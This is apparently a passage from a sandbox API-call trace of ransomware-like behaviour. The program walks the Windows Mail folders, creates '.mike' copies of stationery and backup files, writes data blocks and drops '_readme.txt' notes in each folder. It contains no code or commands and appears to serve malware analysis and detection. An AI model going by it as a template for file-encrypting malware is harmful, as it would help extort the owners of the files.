[0157.708] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.mike", lpFilePart=0x0) returned 0x4a [0157.709] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.mike", lpFilePart=0x0) returned 0x4a [0157.709] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat", dwFileAttributes=0x80) returned 1 [0157.710] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\_readme.txt", lpFilePart=0x0) returned 0x41 [0157.712] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.712] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.713] CoTaskMemFree (pv=0x508980) [0157.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.713] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", lpFilePart=0x0) returned 0x3c [0157.714] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.714] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.714] CoTaskMemFree (pv=0x508980) [0157.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.714] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new", lpFilePart=0x0) returned 0x40 [0157.717] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0157.718] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", lpFilePart=0x0) returned 0x55 [0157.781] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat", lpFilePart=0x0) returned 0x50 [0157.832] WriteFile (in: hFile=0x1c8, lpBuffer=0x218e344*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x218e344*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0157.833] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", lpFilePart=0x0) returned 0x55 [0157.833] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.mike", lpFilePart=0x0) returned 0x55 [0157.834] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat", dwFileAttributes=0x80) returned 1 [0157.835] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.836] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.836] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.837] CoTaskMemFree (pv=0x508980) [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", lpFilePart=0x0) returned 0x40 [0157.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.841] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", lpFilePart=0x0) returned 0x4f [0157.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm", lpFilePart=0x0) returned 0x4a [0157.846] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", lpFilePart=0x0) returned 0x4f [0157.846] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.mike", lpFilePart=0x0) returned 0x4f [0157.846] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm", dwFileAttributes=0x80) returned 1 [0157.847] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.849] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.849] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.850] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", lpFilePart=0x0) returned 0x4a [0157.854] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b346c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21b346c*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.855] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.855] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.856] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", dwFileAttributes=0x80) returned 1 [0157.857] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.859] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.859] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x50 [0157.860] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x4b [0157.863] WriteFile (in: hFile=0x1c8, lpBuffer=0x21c3e20*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21c3e20*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.864] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x50 [0157.865] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm", dwFileAttributes=0x80) returned 1 [0157.866] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.869] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x50 [0157.870] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x4b [0157.876] WriteFile (in: hFile=0x1c8, lpBuffer=0x21f12b4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21f12b4*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.876] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x50 [0157.877] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x50 [0157.877] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", dwFileAttributes=0x80) returned 1 [0157.878] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.881] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x57 [0157.881] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x52 [0157.886] WriteFile (in: hFile=0x1c8, lpBuffer=0x21ffca0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21ffca0*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.887] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x57 [0157.887] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x57 [0157.887] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x80) returned 1 [0157.889] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.891] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.891] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x56 [0157.892] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", lpFilePart=0x0) returned 0x51 [0157.896] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x56 [0157.897] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.mike", lpFilePart=0x0) returned 0x56 [0157.897] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x80) returned 1 [0157.898] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.901] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x55 [0157.901] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm", lpFilePart=0x0) returned 0x50 [0157.905] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x55 [0157.906] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.mike", lpFilePart=0x0) returned 0x55 [0157.906] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm", dwFileAttributes=0x80) returned 1 [0157.907] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.909] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.909] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x54 [0157.910] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x4f [0157.914] WriteFile (in: hFile=0x1c8, lpBuffer=0x2238edc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2238edc*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x54 [0157.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x54 [0157.916] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", dwFileAttributes=0x80) returned 1 [0157.918] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.920] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", lpFilePart=0x0) returned 0x58 [0157.921] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm", lpFilePart=0x0) returned 0x53 [0157.925] WriteFile (in: hFile=0x1c8, lpBuffer=0x2247974*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2247974*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.925] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", lpFilePart=0x0) returned 0x58 [0157.926] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.mike", lpFilePart=0x0) returned 0x58 [0157.926] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 